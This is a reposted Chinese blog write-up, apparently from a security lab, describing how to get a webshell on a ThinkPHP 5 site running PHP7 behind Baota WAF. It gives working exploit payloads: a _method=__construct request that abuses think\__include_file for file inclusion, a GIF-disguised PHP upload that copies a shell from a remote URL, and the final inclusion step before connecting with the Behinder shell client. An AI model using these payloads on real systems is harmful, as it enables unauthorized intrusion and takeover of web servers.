首页 安全文摘 漏洞分析 正文

【奇思淫技】TP5最新getshell漏洞

ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。0X00 基本环境确定目标存在tp5的漏洞,经过后期的探测发现安装有宝

thinkphp 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

0X00 基本环境

确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。

基本环境为:php7 + 宝塔waf

因为php7之后基本确定舍弃了函数assert(),因此有关于assert的所有Payload全部失效!!!
虽然网上有很多关于tp5+php7的文章,但是我尝试之后全部失败。

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第1张

0x01 另辟蹊径

因为之前payload所显示的phpinfo不全,那我们换一种方式!

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第2张

得出关键信息:

disable_functions:

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru


【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第3张

得出关键信息:

网站绝对路径:/www/wwwroot/site

过程不多说!老规矩!

文件包含,payload:
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/www/wwwroot/site/public/robots.txt

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第4张

正好找到了该站的编辑器。(ueditor默认路径)
那么我们现在只需要构造包含内容即可。

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第5张

GIF98a
<?php phpinfo(); ?>
<?php copy("http://url/shell.txt","test.php");?>

添加phpinfo是为了看代码是否正确的执行了,但如果你有自信认为一定成功,那随意。

上传图片,得到路径。

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第6张

继续。

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第7张

payload:

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/site/public/upload/20190322/c627cb130d82cb2f9c5bf4575850cf79.jpg&method=get&server[]=

注意:路径一定要正确!!!

冰蝎连接shell。

【奇思淫技】TP5最新getshell漏洞 安全文摘 漏洞分析  第8张

收工。

作者:曲云杰

来源:Ms08067安全实验室


海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1631.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10269

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10112

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持